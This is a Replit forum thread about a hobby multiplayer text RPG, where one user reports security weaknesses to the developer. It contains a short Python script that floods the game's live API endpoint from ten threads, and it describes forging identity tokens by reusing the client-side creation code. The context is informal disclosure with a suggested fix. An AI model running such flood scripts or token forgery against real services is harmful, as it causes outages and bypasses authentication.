Arrowfall - a text RPG with an advanced text chat and multiplayer!

InvisibleOne · January 17, 2023, 7:42pm

Also someone could probably takedown your api with something like this. Which is really just ddosing it. The only way I know to fix this is rate limiting and blocking IP’s that are making too many requests to your api.

import requests, threading

def attack():
	while True:
		print("running")
		requests.post("https://ArrowFall-Server.bigminiboss.repl.co/person")


threads = []

for i in range(10): # ten threads
	threads.append(threading.Thread(target=attack))

for thread in threads:
	thread.start()

InvisibleOne · January 17, 2023, 7:42pm

Oh the response code, 500, but I wasn’t trying to actually change anything, I just wanted to throw some errors

bigminiboss · January 17, 2023, 7:42pm

ooh, yeah your probably right… ughh, but the API requires lots of requests to function… argh…

InvisibleOne · January 17, 2023, 7:44pm

also I can get a valid identity token by using the same process you use to create one and submitting that

bigminiboss · January 17, 2023, 7:44pm

really? UGHHHHHHH ARE YOU JOKING I thought the origin repl id prevented that…

EDIT: origin repl id meaning I check what the request’s repl id is, I thought that prevented it…

InvisibleOne · January 17, 2023, 7:48pm

Well whenever someone who isn’t the owner (or invited) to the repl runs it, like me, replit basically makes a new version of the repl (as a security measure) so the repl id is completely different.

For example if you run os.environ["REPL_ID"] you will see the id for that repl, but I was see a completely different id.

bigminiboss · January 17, 2023, 7:48pm

dang it, I found out how you do it

ctrl +c
ctrl + d
copy paste functions
make new token

EDIT: judging by the like, it appears this is true and you have done this and hacked it

bigminiboss · January 17, 2023, 7:49pm

yeah repl identity will generate the origin repl id as if it was a hosted repl

InvisibleOne · January 17, 2023, 8:06pm

Really? It doesn’t for me: Try running this repl and seeing if it says “Match!”. If I run it it does, but if I run it on an alt the repl identity is different. https://replit.com/@InvisibleOne/ENV-Test#main.py

bigminiboss · January 17, 2023, 8:15pm

yeah dang I think you need to run the code in my repl?


from json import loads
from os import environ as env
import subprocess
import dataclasses
  
REPLIT_CLI = env["REPLIT_CLI"]
    
    
@dataclasses.dataclass
class IdentityToken:
  """A Repl Identity token parsed into fields"""
  
  replid: str
  user: str
  slug: str
  aud: str
  ephemeral: bool = False
  origin: str = ""
  originReplId: str = ""
  
  
def create_identity_token(audience: str, cmd: str = "replit") -> str:
  """Create an identity token addressed to the given audience."""
  token = subprocess.check_output(
      [cmd, "identity", "create", f"-audience={audience}"])
  return token.decode("utf-8").strip()
  
  
def verify_identity_token(expected_audience: str,
                        token: str,
                        cmd: str = "replit") -> IdentityToken:
  """Verify the given identity token and decode it if verification passes."""
  token = subprocess.check_output([
      cmd,
      "identity",
      "verify",
      f"-audience={expected_audience}",
      f"-token={token}",
      "-json",
  ])
  return IdentityToken(**loads(token))

bigminiboss · January 17, 2023, 8:17pm

running verify_identity_token will give you the correct id, it’s outlined here and to a lesser degree here for python

InvisibleOne · January 17, 2023, 8:19pm

Yeah, any ENV’s are only in your repl, they hold completely different values if I run the code. Since (as far as I know) replit basically creates a new environment for me when I run your code (unless it’s a webserver)
Which is why if you run publish code that writes something to a TXT file, and I run that code, nobody else but me will see the changes to the file.

bigminiboss · January 17, 2023, 8:20pm

yes, I know this, but I’m pretty sure repl identity gets it to work? Maybe try using the one’s outlined in the blog?

InvisibleOne · January 17, 2023, 9:02pm

Ok, I messed around with repl identity and I think the issue is you are verifying the identity in your “frontend” instead of your backend like you should (correct me if I’m wrong)

Try seeing if you can abuse this api:

“Front End”:
https://replit.com/@InvisibleOne/Token-Test#main.py

should output “{“verify” : True}” unless you fork it, then verify will be False

“Server”
https://replit.com/@InvisibleOne/Token-Test-Server#main.py

BearCoder01 · January 18, 2023, 12:41pm

Cool, but how did you maka a chat system that is laggless and updating at the same time? When I tried to creat a chat system it started lagging because of the threads.

InvisibleOne · January 18, 2023, 2:33pm

bigminiboss will probably know better, but I’m assuming the code is just waiting for events and then updating, if you are constantly updated it will get super laggy.

bigminiboss · January 18, 2023, 4:57pm

yes, this is what it’s doing it checks new events every second but only updates the console when it receives a new message

Doomsdaybear · January 19, 2023, 2:49pm

Arrowfall is down currently, any explanation why?

bigminiboss · January 19, 2023, 2:51pm

The main dev, Overdrive, decided they found the project too taxing to be currently released as they were pressured into releasing it after grinding it for a month with about 60 hours total, and they were experiencing burnout. Therefore, they may re-release it after bug fixing, but they also may never release it again

Doomsdaybear · January 19, 2023, 2:52pm

Got it, thanks!

words so i can post this.